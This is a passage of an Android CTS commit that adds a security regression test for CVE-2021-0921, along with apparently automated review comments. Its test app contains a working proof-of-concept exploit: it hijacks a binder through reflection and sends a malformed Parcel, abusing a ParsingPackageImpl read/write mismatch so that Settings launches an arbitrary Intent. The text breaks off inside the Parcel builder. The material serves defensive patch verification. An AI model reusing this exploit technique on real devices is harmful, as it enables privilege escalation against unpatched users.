authorMiroslaw Niemiec <mniemiec@google.com>2021-09-22 17:03:58 +0000
committerMiroslaw Niemiec <mniemiec@google.com>2021-10-07 23:49:27 +0000
commit8b3f52fe3965e35f14c1d1d071faf71e1dd39f08 (patch)
tree60f29ea0970a72e5b71c43bf8e11afd04bbf9d32
parent1ac06aad84bd85218d9a41e6df50ece65b621ec8 (diff)
downloadcts-8b3f52fe3965e35f14c1d1d071faf71e1dd39f08.tar.gz
STS test for Android Security CVE-2021-0921
Test: sts-tradefed run sts-engbuild-no-spl-lock -m CtsSecurityBulletinHostTestCases -t android.security.cts.CVE_2021_0921 Bug: 199779591 Bug: 195962697 Change-Id: Ie5505d4d8d42bc5269d7ef6de9d185ef19f9bcd3 Merged-In: Ie5505d4d8d42bc5269d7ef6de9d185ef19f9bcd3
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0921.java68
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-0921/Android.mk36
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-0921/AndroidManifest.xml57
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/layout/activity_main.xml26
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/values/colors.xml6
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/values/strings.xml3
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/xml/authenticator.xml5
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/Authenticator.java157
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/AuthenticatorActivity.java31
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/AuthenticatorService.java15
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/DeviceTest.java63
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/GenMalformedParcel.java210
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/TestActivity.java23
-rw-r--r--hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/Trigger.java41
14 files changed, 741 insertions, 0 deletions
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0921.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0921.java
new file mode 100644
index 00000000000..27900e19fcb
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0921.java
@@ -0,0 +1,68 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.AppModeFull;
+import android.util.Log;
+import android.platform.test.annotations.AsbSecurityTest;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import com.android.tradefed.testtype.junit4.BaseHostJUnit4Test;
+import com.android.tradefed.log.LogUtil.CLog;
+import org.junit.After;
+import org.junit.Assert;
+import org.junit.Before;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import static org.junit.Assert.*;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2021_0921 extends BaseHostJUnit4Test {
+ private static final String TEST_PKG = "android.security.cts.CVE_2021_0921";
+ private static final String TEST_CLASS = TEST_PKG + "." + "DeviceTest";
+ private static final String TEST_APP = "CVE-2021-0921.apk";
+
+ @Before
+ public void setUp() throws Exception {
+ uninstallPackage(getDevice(), TEST_PKG);
+ }
+
+ @Test
+ @AsbSecurityTest(cveBugId = 195962697)
+ @AppModeFull
+ public void testRunDeviceTest() throws Exception {
+
+ CLog.i("testRunDeviceTest() start");
+ installPackage();
+
+ //ensure the screen is woken up.
+ //KEYCODE_WAKEUP wakes up the screen
+ //KEYCODE_MENU called twice unlocks the screen (if locked)
+ getDevice().executeShellCommand("input keyevent KEYCODE_WAKEUP");
+ getDevice().executeShellCommand("input keyevent KEYCODE_MENU");
+ getDevice().executeShellCommand("input keyevent KEYCODE_HOME");
+ getDevice().executeShellCommand("input keyevent KEYCODE_MENU");
+
+ //run the test
+ Assert.assertTrue(runDeviceTests(TEST_PKG, TEST_CLASS, "test"));
+ CLog.i("testRunDeviceTest() end");
+ }
+
+ private void installPackage() throws Exception {
+ installPackage(TEST_APP, new String[0]);
+ }
+}
+
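Review bot: `testRunDeviceTest()` installs `CVE-2021-0921.apk`, but the class has no `@After` method, so the test app and its exported `android.security.cts` account authenticator stay on the device after the run; only the next run's `setUp()` removes them. Add a teardown such as `@After public void tearDown() throws Exception { uninstallPackage(getDevice(), TEST_PKG); }` (`org.junit.After` is already imported). The imports `android.util.Log` and `static org.junit.Assert.*` are unused in this file and can be dropped.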
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/Android.mk b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/Android.mk
new file mode 100644
index 00000000000..57296eb1390
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/Android.mk
@@ -0,0 +1,36 @@
+# Copyright (C) 2021 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+include $(CLEAR_VARS)
+
+LOCAL_PACKAGE_NAME := CVE-2021-0921
+LOCAL_SRC_FILES := $(call all-java-files-under, src)
+LOCAL_MODULE_TAGS := tests
+LOCAL_SDK_VERSION := current
+LOCAL_STATIC_JAVA_LIBRARIES := androidx.test.core
+LOCAL_STATIC_JAVA_LIBRARIES += androidx.test.rules
+LOCAL_STATIC_JAVA_LIBRARIES += ub-uiautomator
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts vts sts
+
+LOCAL_PROGUARD_ENABLED := disabled
+LOCAL_DEX_PREOPT := false
+include $(BUILD_CTS_SUPPORT_PACKAGE)
+
+
+
+
+
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/AndroidManifest.xml
new file mode 100644
index 00000000000..2e81b866e48
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/AndroidManifest.xml
@@ -0,0 +1,57 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ xmlns:tools="http://schemas.android.com/tools"
+ package="android.security.cts.CVE_2021_0921"
+ android:targetSandboxVersion="2">
+
+ <application>
+ <uses-library android:name="android.test.runner"/>
+
+ <activity android:name=".AuthenticatorActivity" android:exported="true">
+ <intent-filter>
+ <action android:name="android.intent.action.MAIN" />
+ <category android:name="android.intent.category.LAUNCHER" />
+ </intent-filter>
+ </activity>
+
+ <activity android:name=".TestActivity" android:exported="true">
+ <intent-filter>
+ <action android:name="android.intent.action.RUN"/>
+ <category android:name="android.intent.category.DEFAULT"/>
+ </intent-filter>
+ </activity>
+
+ <service
+ android:name=".AuthenticatorService"
+ android:enabled="true"
+ android:exported="true">
+ <intent-filter>
+ <action android:name="android.accounts.AccountAuthenticator" />
+ </intent-filter>
+
+ <meta-data
+ android:name="android.accounts.AccountAuthenticator"
+ android:resource="@xml/authenticator" />
+ </service>
+ </application>
+
+ <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.CVE_2021_0921" />
+
+</manifest>
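Review bot: `.TestActivity` is declared `android:exported="true"` with an `android.intent.action.RUN` filter, yet `Trigger.accountSettings()` addresses it with an explicit `new Intent(mContext, TestActivity.class)`, so the filter does not appear to be needed on the test path. Because `TestActivity.onCreate()` calls `Assert.fail(...)` unconditionally, anything else on the device that starts this activity makes the run report the device as vulnerable. Consider dropping the `<intent-filter>` and, if the activity is still reachable from Settings on an unpatched build, setting `android:exported="false"`. The `xmlns:tools` declaration is unused.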
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/layout/activity_main.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/layout/activity_main.xml
new file mode 100644
index 00000000000..09d024c301f
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/layout/activity_main.xml
@@ -0,0 +1,26 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2021 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<LinearLayout
+ xmlns:android="http://schemas.android.com/apk/res/android"
+ android:layout_width="match_parent"
+ android:layout_height="match_parent">
+ <TextView
+ android:layout_width="match_parent"
+ android:layout_height="match_parent"
+ android:text="CVE-2021-0921"/>
+</LinearLayout>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/values/colors.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/values/colors.xml
new file mode 100644
index 00000000000..69b22338c65
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/values/colors.xml
@@ -0,0 +1,6 @@
+<?xml version="1.0" encoding="utf-8"?>
+<resources>
+ <color name="colorPrimary">#008577</color>
+ <color name="colorPrimaryDark">#00574B</color>
+ <color name="colorAccent">#D81B60</color>
+</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/values/strings.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/values/strings.xml
new file mode 100644
index 00000000000..1a689a5305b
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/values/strings.xml
@@ -0,0 +1,3 @@
+<resources>
+ <string name="app_name">AnyIntentPoc</string>
+</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/xml/authenticator.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/xml/authenticator.xml
new file mode 100644
index 00000000000..46194d5022f
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/xml/authenticator.xml
@@ -0,0 +1,5 @@
+<?xml version="1.0" encoding="utf-8"?>
+<account-authenticator
+ xmlns:android="http://schemas.android.com/apk/res/android"
+ android:accountType="android.security.cts"
+ android:label="@string/app_name"/>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/Authenticator.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/Authenticator.java
new file mode 100644
index 00000000000..4d4ad986f2b
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/Authenticator.java
@@ -0,0 +1,157 @@
+package android.security.cts.CVE_2021_0921;
+
+import android.accounts.AbstractAccountAuthenticator;
+import android.accounts.Account;
+import android.accounts.AccountAuthenticatorResponse;
+import android.annotation.SuppressLint;
+import android.content.Context;
+import android.content.Intent;
+import android.os.Bundle;
+import android.os.IBinder;
+import android.os.IInterface;
+import android.os.Parcel;
+import android.os.RemoteException;
+import android.util.Log;
+
+import java.io.FileDescriptor;
+import java.lang.reflect.Field;
+
+public class Authenticator extends AbstractAccountAuthenticator {
+ public static Intent mIntent;
+ private int TRANSACTION_onResult;
+ private IBinder mOriginRemote;
+ private static final String TAG = "TAG_2021_0921.Authenticator";
+ private IBinder mProxyRemote = new IBinder() {
+ @Override
+ public String getInterfaceDescriptor() throws RemoteException {
+ return null;
+ }
+
+ @Override
+ public boolean pingBinder() {
+ return false;
+ }
+
+ @Override
+ public boolean isBinderAlive() {
+ return false;
+ }
+
+ @Override
+ public IInterface queryLocalInterface(String descriptor) {
+ return null;
+ }
+
+ @Override
+ public void dump(FileDescriptor fd, String[] args) throws RemoteException {
+ }
+
+ @Override
+ public void dumpAsync(FileDescriptor fd, String[] args) throws RemoteException {
+ }
+
+ @Override
+ public boolean transact(int code, Parcel data, Parcel reply, int flags) throws RemoteException {
+ Log.d(TAG, "transact() start");
+ if (code == TRANSACTION_onResult) {
+ Log.d(TAG, "transact() before parse");
+ data.recycle();
+ data = GenMalformedParcel.parsingPackageImplParcel(mIntent);
+ Log.d(TAG, "transact() end parse");
+ }
+ Log.d(TAG, "transact() continue");
+ mOriginRemote.transact(code, data, reply, flags);
+ Log.d(TAG, "transact() end");
+ return true;
+ }
+
+ @Override
+ public void linkToDeath(DeathRecipient recipient, int flags) throws RemoteException {
+ }
+
+ @Override
+ public boolean unlinkToDeath(DeathRecipient recipient, int flags) {
+ return false;
+ }
+ };
+
+ public Authenticator(Context context) {
+ super(context);
+ Log.d(TAG, "Authenticator() constructor");
+ }
+
+ @Override
+ public String getAuthTokenLabel(String authTokenType) {
+ return null;
+ }
+
+ @Override
+ public Bundle editProperties(AccountAuthenticatorResponse response, String accountType) {
+ return null;
+ }
+
+ @Override
+ public Bundle getAuthToken(AccountAuthenticatorResponse response, Account account,
+ String authTokenType, Bundle options) {
+ return null;
+ }
+
+ @Override
+ public Bundle addAccount(AccountAuthenticatorResponse response, String accountType,
+ String authTokenType, String[] requiredFeatures, Bundle options) {
+
+ Log.d(TAG, "addAccount() start");
+ try {
+ Class AccountAuthenticatorResponseClass = Class.forName("android.accounts.AccountAuthenticatorResponse");
+ @SuppressLint("SoonBlockedPrivateApi")
+ Field mAccountAuthenticatorResponseField = AccountAuthenticatorResponseClass.getDeclaredField("mAccountAuthenticatorResponse");
+ mAccountAuthenticatorResponseField.setAccessible(true);
+ Object mAccountAuthenticatorResponse = mAccountAuthenticatorResponseField.get(response);
+
+ Class stubClass = null;
+ for (Class inner : Class.forName("android.accounts.IAccountAuthenticatorResponse").getDeclaredClasses()) {
+ if (inner.getCanonicalName().equals("android.accounts.IAccountAuthenticatorResponse.Stub")) {
+ stubClass = inner;
+ break;
+ }
+ }
+
+ Field TRANSACTION_onResultField = stubClass.getDeclaredField("TRANSACTION_onResult");
+ TRANSACTION_onResultField.setAccessible(true);
+ TRANSACTION_onResult = TRANSACTION_onResultField.getInt(null);
+
+ Class proxyClass = null;
+ for (Class inner : stubClass.getDeclaredClasses()) {
+ if (inner.getCanonicalName().equals("android.accounts.IAccountAuthenticatorResponse.Stub.Proxy")) {
+ proxyClass = inner;
+ break;
+ }
+ }
+
+ Field mRemoteField = proxyClass.getDeclaredField("mRemote");
+ mRemoteField.setAccessible(true);
+ mOriginRemote = (IBinder) mRemoteField.get(mAccountAuthenticatorResponse);
+ mRemoteField.set(mAccountAuthenticatorResponse, mProxyRemote);
+ } catch (Exception e) {
+ e.printStackTrace();
+ }
+ Log.d(TAG, "addAccount() end");
+
+ return new Bundle();
+ }
+
+ @Override
+ public Bundle confirmCredentials(AccountAuthenticatorResponse response, Account account, Bundle options) {
+ return null;
+ }
+
+ @Override
+ public Bundle updateCredentials(AccountAuthenticatorResponse response, Account account, String authTokenType, Bundle options) {
+ return null;
+ }
+
+ @Override
+ public Bundle hasFeatures(AccountAuthenticatorResponse response, Account account, String[] features) {
+ return null;
+ }
+}
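Review bot: In `addAccount()` the whole reflection sequence sits inside `catch (Exception e) { e.printStackTrace(); }`, so any failure there (a hidden-API restriction on `mAccountAuthenticatorResponse` or `mRemote`, or `stubClass`/`proxyClass` left `null` when the canonical-name comparison does not match) leaves the proxy binder uninstalled, and the device test then passes as if the device were patched. Record the failure so the run is inconclusive rather than green: log it with `Log.e(TAG, "addAccount() could not install proxy binder", e);` and set a static flag that `DeviceTest.test()` checks after its wait. `transact()` also returns `true` unconditionally instead of the result of `mOriginRemote.transact(...)`. The raw `Class` locals could be `Class<?>`, and the file lacks the license header that `DeviceTest.java` carries.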
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/AuthenticatorActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/AuthenticatorActivity.java
new file mode 100644
index 00000000000..41e30eb5ca0
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/AuthenticatorActivity.java
@@ -0,0 +1,31 @@
+package android.security.cts.CVE_2021_0921;
+
+import android.content.Context;
+import android.app.Activity;
+import android.os.Build;
+import android.os.Bundle;
+import android.util.Log;
+
+public class AuthenticatorActivity extends Activity {
+
+ private static final String TAG = "TAG_2021_0921.AuthenticatorActivity";
+
+ @Override
+ protected void onCreate(Bundle savedInstanceState) {
+ super.onCreate(savedInstanceState);
+ Log.d(TAG, "onCreate() start");
+ setContentView(R.layout.activity_main);
+ new Trigger(AuthenticatorActivity.this).accountSettings();
+ Log.d(TAG, "onCreate() end");
+ }
+
+ @Override
+ protected void onResume() {
+ super.onResume();
+ this.finish();
+ }
+}
+
+
+
+
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/AuthenticatorService.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/AuthenticatorService.java
new file mode 100644
index 00000000000..917056239bb
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/AuthenticatorService.java
@@ -0,0 +1,15 @@
+package android.security.cts.CVE_2021_0921;
+
+import android.app.Service;
+import android.content.Intent;
+import android.os.IBinder;
+
+public class AuthenticatorService extends Service {
+ public AuthenticatorService() {
+ }
+
+ @Override
+ public IBinder onBind(Intent intent) {
+ return new Authenticator(this).getIBinder();
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/DeviceTest.java
new file mode 100644
index 00000000000..51733ef15cf
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/DeviceTest.java
@@ -0,0 +1,63 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2021_0921;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import android.content.Context;
+import android.content.Intent;
+import android.content.pm.PackageManager;
+import android.os.SystemClock;
+import android.util.Log;
+import android.support.test.uiautomator.UiDevice;
+import androidx.test.runner.AndroidJUnit4;
+
+import static androidx.test.core.app.ApplicationProvider.getApplicationContext;
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+import static org.junit.Assert.assertFalse;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+
+ private static final String TAG = "TAG_2021_0921.DeviceTest";
+ private UiDevice mDevice;
+
+ @Test
+ public void test() {
+ Log.d(TAG, "test() start");
+
+ //set mDevice and go to homescreen
+ mDevice = UiDevice.getInstance(getInstrumentation());
+ mDevice.pressHome();
+ Context context = getApplicationContext();
+ String TEST_PACKAGE = "android.security.cts.CVE_2021_0921";
+ PackageManager packageManager = context.getPackageManager();
+
+ //start poc app
+ Intent intent = packageManager.getLaunchIntentForPackage(TEST_PACKAGE);
+ intent.addFlags(Intent.FLAG_ACTIVITY_CLEAR_TASK);
+ intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+ context.startActivity(intent);
+
+ //wait for poc app to complete (it takes about 6 seconds)
+ SystemClock.sleep(20000);
+
+ Log.d(TAG, "test() end");
+ }
+}
+
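Review bot: `test()` contains no assertion: it launches the app, sleeps for a fixed 20 s and returns, so the verdict depends entirely on `TestActivity.onCreate()` throwing from `Assert.fail(...)` on the app's main thread and on the runner reporting that crash as a test failure. A green result therefore cannot distinguish a patched device from a run in which the PoC never got as far as Settings. Prefer an explicit signal: have `TestActivity` set a flag or count down a latch that `test()` awaits with a timeout and then checks with the already-imported `assertFalse`. `getLaunchIntentForPackage()` may return `null`, which currently surfaces as a NullPointerException at `intent.addFlags(...)` and would read as a vulnerable device; guard it with `assertNotNull("no launch intent for " + TEST_PACKAGE, intent);`. The comment says the PoC takes about 6 seconds while the sleep is 20000 ms.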
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/GenMalformedParcel.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/GenMalformedParcel.java
new file mode 100644
index 00000000000..ff0bb62e928
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/GenMalformedParcel.java
@@ -0,0 +1,210 @@
+package android.security.cts.CVE_2021_0921;
+
+import android.accounts.AccountManager;
+import android.content.Intent;
+import android.os.Binder;
+import android.os.Bundle;
+import android.os.Parcel;
+import android.util.Log;
+
+public class GenMalformedParcel {
+
+ private static final String TAG = "TAG_2021_0921.GenMalformedParcel";
+
+ public static Parcel parsingPackageImplParcel(Intent intent) {
+ Log.d(TAG, "parsingPackageImplParcel() start");
+
+ Parcel data = Parcel.obtain();
+ data.writeInterfaceToken("android.accounts.IAccountAuthenticatorResponse");
+ data.writeInt(1);
+ int bundleLenPos = data.dataPosition();
+ data.writeInt(0);
+ data.writeInt(0x4C444E42);
+ int bundleStartPos = data.dataPosition();
+ data.writeInt(3);
+
+ data.writeString("key1");
+ data.writeInt(4);
+ data.writeString("android.content.pm.parsing.ParsingPackageImpl");
+
+ data.writeInt(0); // supportsSmallScreens
+ data.writeInt(0); // supportsNormalScreens
+ data.writeInt(0); // supportsLargeScreens
+ data.writeInt(0); // supportsExtraLargeScreens
+ data.writeInt(0); // resizeable
+ data.writeInt(0); // anyDensity
+ data.writeInt(0); // versionCode
+ data.writeInt(0); // versionCodeMajor
+ data.writeInt(0); // baseRevisionCode
+ data.writeString("versionName"); // versionName
+ data.writeInt(0); // compileSdkVersion
+ data.writeString("compileSdkVersionCodeName"); // compileSdkVersionCodeName
+ data.writeString("packageName"); // packageName
+ data.writeString("realPackage"); // realPackage
+ data.writeString("baseCodePath"); // baseCodePath
+ data.writeInt(false ? 1 : 0); // requiredForAllUsers
+ data.writeString("restrictedAccountType"); // restrictedAccountType
+ data.writeString("requiredAccountType"); // requiredAccountType
+ data.writeString("overlayTarget"); // overlayTarget
+ data.writeString("overlayTargetName"); // overlayTargetName
+ data.writeString("overlayCategory"); // overlayCategory
+ data.writeInt(0); // overlayPriority
+ data.writeInt(false ? 1 : 0); // overlayIsStatic
+ data.writeInt(0); // overlayables
+ data.writeString("staticSharedLibName"); // staticSharedLibName
+ data.writeLong(0); // staticSharedLibVersion
+ data.writeInt(0); // libraryNames
+ data.writeInt(0); // usesLibraries
+ data.writeInt(0); // usesOptionalLibraries
+ data.writeInt(0); // usesStaticLibraries
+ data.writeInt(0); // usesStaticLibrariesVersions
+ data.writeInt(0); // digestsSize
+ data.writeString("sharedUserId"); // sharedUserId
+ data.writeInt(0); // sharedUserLabel
+ data.writeInt(0); // configPreferences
+ data.writeInt(0); // reqFeatures
+ data.writeInt(0); // featureGroups
+ data.writeInt(0); // restrictUpdateHash
+ data.writeInt(0); // originalPackages
+ data.writeInt(0); // adoptPermissions
+ data.writeInt(0); // requestedPermissions
+ data.writeInt(0); // implicitPermissions
+ data.writeInt(0); // upgradeKeySets
+ data.writeInt(0); // keySetMapping
+ data.writeInt(0); // protectedBroadcasts
+ data.writeInt(0); // activities
+ data.writeInt(0); // receivers
+ data.writeInt(0); // services
+ data.writeInt(0); // providers
+ data.writeInt(0); // attributions
+ data.writeInt(0); // permissions
+ data.writeInt(0); // permissionGroups
+ data.writeInt(0); // instrumentations
+ data.writeInt(0); // preferredActivityFilters
+ data.writeInt(0); // processes
+ data.writeInt(0); // metaData
+ data.writeString("volumeUuid"); // volumeUuid
+ data.writeInt(-1); // signingDetails
+ data.writeString("codePath"); // codePath
+ data.writeInt(false ? 1 : 0); // use32BitAbi
+ data.writeInt(false ? 1 : 0); // visibleToInstantApps
+ data.writeInt(false ? 1 : 0); // forceQueryable
+
+ data.writeInt(1); // queriesIntents
+ data.writeInt(0); // queriesIntents
+
+ data.writeInt(0); // queriesPackages
+ data.writeInt(0); // queriesProviders
+ data.writeString(""); // appComponentFactory
+ data.writeString(""); // backupAgentName
+ data.writeInt(-1); // banner
+ data.writeInt(0); // category
+ data.writeString(""); // classLoaderName
+ data.writeString("className"); // className
+ data.writeInt(-1); // compatibleWidthLimitDp
+ data.writeInt(0); // descriptionRes
+ data.writeInt(false ? 1 : 0); // enabled
+ data.writeInt(false ? 1 : 0); // crossProfile
+ data.writeInt(0); // fullBackupContent
+ data.writeInt(0); // iconRes
+ data.writeInt(0); // installLocation
+
+ data.writeInt(0); // labelRes -> queriesPackages
+ data.writeInt(0); // largestWidthLimitDp -> queriesProviders
+ data.writeInt(-1); // logo -> appComponentFactory
+ data.writeString("manageSpaceActivityName"); // manageSpaceActivityName -> backupAgentName
+ data.writeFloat(0); // maxAspectRatio -> banner
+ data.writeFloat(0); // minAspectRatio -> category
+ data.writeInt(-1); // minSdkVersion -> classLoaderName
+ data.writeInt(-1); // networkSecurityConfigRes -> className
+ data.writeInt(1); // nonLocalizedLabel -> compatibleWidthLimitDp
+ data.writeInt(-1); // nonLocalizedLabel -> descriptionRes
+ data.writeInt(-1); // permission -> enabled
+ data.writeInt(-1); // processName -> crossProfile
+ data.writeInt(0); // requiresSmallestWidthDp -> fullBackupContent
+ data.writeInt(0); // roundIconRes -> iconRes
+ data.writeInt(0); // targetSandboxVersion -> installLocation
+ data.writeInt(0); // targetSdkVersion -> labelRes
+ data.writeInt(-1); // taskAffinity -> largestWidthLimitDp
+ data.writeInt(0); // theme -> logo
+ data.writeInt(-1); // uiOptions -> manageSpaceActivityName
+ data.writeInt(-1); // zygotePreloadName -> maxAspectRatio
+ data.writeInt(0); // splitClassLoaderNames -> minAspectRatio
+ data.writeInt(0); // splitCodePaths -> minSdkVersion
+ data.writeInt(0); // splitDependencies -> networkSecurityConfigRes
+ data.writeInt(0); // splitFlags -> nonLocalizedLabel
+ data.writeInt(-1); // splitNames -> nonLocalizedLabel
+ data.writeInt(-1); // splitRevisionCodes -> permission
+ data.writeInt(false ? 1 : 0); // externalStorage -> processName
+ data.writeInt(false ? 1 : 0); // baseHardwareAccelerated -> processName
+ data.writeInt(true ? 1 : 0); // allowBackup -> requiresSmallestWidthDp
+ data.writeInt(false ? 1 : 0); // killAfterRestore -> roundIconRes
+ data.writeInt(false ? 1 : 0); // restoreAnyVersion -> targetSandboxVersion
+ data.writeInt(false ? 1 : 0); // fullBackupOnly -> targetSdkVersion
+ data.writeInt(false ? 1 : 0); // persistent -> taskAffinity
+ data.writeInt(false ? 1 : 0); // debuggable -> taskAffinity
+ data.writeInt(false ? 1 : 0); // vmSafeMode -> theme
+ data.writeInt(false ? 1 : 0); // hasCode -> uiOptions
+ data.writeInt(false ? 1 : 0); // allowTaskReparenting -> zygotePreloadName
+ data.writeInt(false ? 1 : 0); // allowClearUserData -> zygotePreloadName
+ data.writeInt(false ? 1 : 0); // largeHeap -> splitClassLoaderNames
+ data.writeInt(false ? 1 : 0); // usesCleartextTraffic -> splitCodePaths
+ data.writeInt(false ? 1 : 0); // supportsRtl -> splitDependencies
+ data.writeInt(false ? 1 : 0); // testOnly -> splitFlags
+ data.writeInt(false ? 1 : 0); // multiArch -> splitNames
+ data.writeInt(false ? 1 : 0); // extractNativeLibs -> splitRevisionCodes
+ data.writeInt(false ? 1 : 0); // game -> externalStorage
+ data.writeInt(false ? 1 : 0); // resizeableActivity -> baseHardwareAccelerated
+ data.writeInt(false ? 1 : 0); // staticSharedLibrary -> allowBackup
